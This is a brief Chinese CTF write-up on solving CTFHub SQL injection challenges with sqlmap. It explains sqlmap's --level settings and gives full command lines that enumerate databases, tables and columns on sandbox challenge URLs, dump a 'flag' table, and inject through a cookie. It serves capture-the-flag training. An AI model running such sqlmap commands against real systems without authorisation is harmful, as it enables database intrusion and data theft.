CTFHUB|SQL注入(sqlmap)
差不多学了4天的SQL手工注入,学习一下sqlmap的使用,用工具偷偷懒。但等级越高,其速度越慢。
探测等级
--level1:默认的等级,会进行基本的测试,包括GET和POST方式。
--level2: 在原有的基础上增加对cookie的检测。
--level3: 增加对User Agent、Referer 的检测
--lever4: 更多的payload
--level5: 最高等级,包含所有的payload,会尝试自动破解出cookie、xff等头部注入。
过程中都会有五个选择
一、整数型注入
1、找数据库
sqlmap.py -u "http://challenge-1263a0320a449d85.sandbox.ctfhub.com:10800/?id=1" --dbs
2、找数据库里面的表
python sqlmap.py -u "http://challenge-1263a0320a449d85.sandbox.ctfhub.com:10800/?id=1" -D sqli --tables
3、看表的列数
python sqlmap.py -u "http://challenge-1263a0320a449d85.sandbox.ctfhub.com:10800/?id=1" -D sqli -T flag --columns
4、爆破列里面的内容
>python sqlmap.py -u "http://challenge-1263a0320a449d85.sandbox.ctfhub.com:10800/?id=1" -D sqli -T flag -C flag --dump
二、字符型注入
同一理
三、报错注入
同一理
四、布尔盲注
同一理
五、时间盲注
同一理
六、MySQL结构
同一理
七、Cookie注入
1、顾名思义,要拿到cookie值
2、需要设置level至少为2
python sqlmap.py -u "http://challenge-aa747be60c43fb63.sandbox.ctfhub.com:10800/" --cookie "id=1; hint=id%E8%BE%93%E5%85%A51%E8%AF%95%E8%AF%95%EF%BC%9F" --level 2 --dbs
之后同理
八、UA注入
UA注入用--level 3
其他同上
九、Refer注入
同上
一定要在时间内跑出来,要不然过期了就跑不出来了
十、过滤空格
根据要求加上这个